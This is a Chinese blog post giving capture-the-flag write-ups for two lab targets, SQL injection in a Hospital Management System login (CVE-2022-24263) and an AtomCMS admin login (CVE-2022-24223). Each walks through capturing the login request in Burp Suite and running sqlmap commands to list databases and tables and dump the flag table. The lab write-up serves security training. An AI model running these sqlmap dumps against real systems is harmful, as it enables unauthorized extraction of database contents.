【春秋云境】CVE-2022-24263靶场WP和CVE-2022-24223靶场WP

已于 2022-12-02 02:32:09 修改
阅读量542 收藏
点赞数
分类专栏: 春秋云镜 文章标签: 网络安全 web安全 mysql
于 2022-12-01 22:44:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128140204
版权

【春秋云境】CVE-2022-24263靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Hospital Management System sqli
2.开启靶场

请添加图片描述

3.寻找注入点

  • 根据提示该CMS存在sql注入,其注入点就在登录的位置

    请添加图片描述

4.burpsuite抓包
  • 开启BP抓包,随便填写用户名密码信息,点击Login。将请求包保存为1.txt
    请添加图片描述
5.sqlmap攻击

  • 爆库,发现存在ctf库,那咱们就可以直接梭哈

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch --dbs

    请添加图片描述

  • 爆表

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D ctf --tables

    请添加图片描述

  • 爆字段

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D ctf -T flag --dump

    请添加图片描述

成功获得flag

【春秋云境】CVE-2022-24223靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • AtomCMS SQL注入漏洞
2.开启靶场

请添加图片描述

3.寻找后台

  • 打开靶场直接跳到/home页面,但是页面没有任何有价值的信息,所以咱们尝试寻找后台。尝试/admin,果然跳转到了/admin/login.php的后台登陆页面

    请添加图片描述

4.burpsuite抓包

  • 开启BP抓包,随便填写用户名密码信息,点击submit。将请求包保存为1.txt

    请添加图片描述

5.sqlmap攻击

  • 爆库,发现存在一个atomcms库,我们继续对其进行爆表

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch --dbs

    请添加图片描述

  • 爆表

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D atomcms --tables

    请添加图片描述

  • 爆字段

    python3 sqlmap.py -r C:\Users\Anonymous\Desktop\1.txt --batch -D atomcms -T flag --dump

    请添加图片描述

成功获得flag

果粒程1122
关注
专栏目录
CVE-2022-24223 - AtomCMS SQL注入漏洞
Debugging
10-31 445
CVE-2022-24223 - AtomCMS SQL注入漏洞
CVE-2022-21661
热门推荐
Battery的博客
11-23 11万+
2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。
春秋云境CVE-2022-24223
一只爱吃橙子的羊
12-02 1306
AtomCMS SQL注入漏洞
Hospital Management System v4.0 SQL 注入漏洞(CVE-2022-24263
最新发布
Flag少侠的博客
07-08 9091
打开靶场进入靶场是这个页面网上查找漏洞相关信息点击登录可以看到有一个邮箱参数及密码,这里应该就是漏洞了打开 BurpSuite 拦截抓包复制值到 txt 文件中,使用 SQLMap 开跑省略爆库爆表过程……(太慢了)_____H__------[Y/n] n1ba6}[1 entry]| flag |
[春秋云镜]CVE-2022-24263
niubi707的博客
11-29 690
春秋云镜CVE-2022-24263Hospital Management System sqli
春秋云境CVE-2022-24223(AtomCMS SQL注入漏洞)
m0_65712192的博客
07-22 558
春秋云境CVE-2022-24223(AtomCMS SQL注入漏洞)
CVE-2022-24263
m0_51674437的博客
07-21 190
cve-2022-24263漏洞复现和代码审计
春秋CVE-2022-21661
09-04
- *1* *3* [【春秋云境CVE-2022-2073靶场WPCVE-2022-1014靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128231197)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra...
i春秋CVE-2022-32991
08-12
- *1* *2* *3* [【春秋云境CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
CVE-2022-22909
07-29
- *1* *2* [【春秋云境CVE-2022-22963靶场WPCVE-2022-22909靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128208529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1450
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
春秋云境CVE-2022-24223复现
小高工作室
12-01 361
命令查看下 python sqlmap.py -r 2.txt -D atomcms -T flag --columns --dump。域名home改成admin试试。有个奇怪的atomcms。
春秋云镜 CVE-2022-24223
qq_22002773的博客
07-08 259
春秋云镜 CVE-2022-24223
春秋云境CVE-2022-24263
一只爱吃橙子的羊
12-02 959
Hospital Management System sqli
CVE-2022-24223
m0_51674437的博客
07-25 230
CVE-2022-24223漏洞复现
春秋云境CVE-2022-23134靶场WPCVE-2022-22965靶场WP
果粒程
12-05 1188
春秋云境CVE-2022-23134靶场WPCVE-2022-22965靶场WP
春秋云境Initial WP
m0_62466350的博客
12-05 1108
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
Atom CMS SQL注入(CVE-2022-24223
weixin_68999845的博客
08-16 524
CVE-2022-24223
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值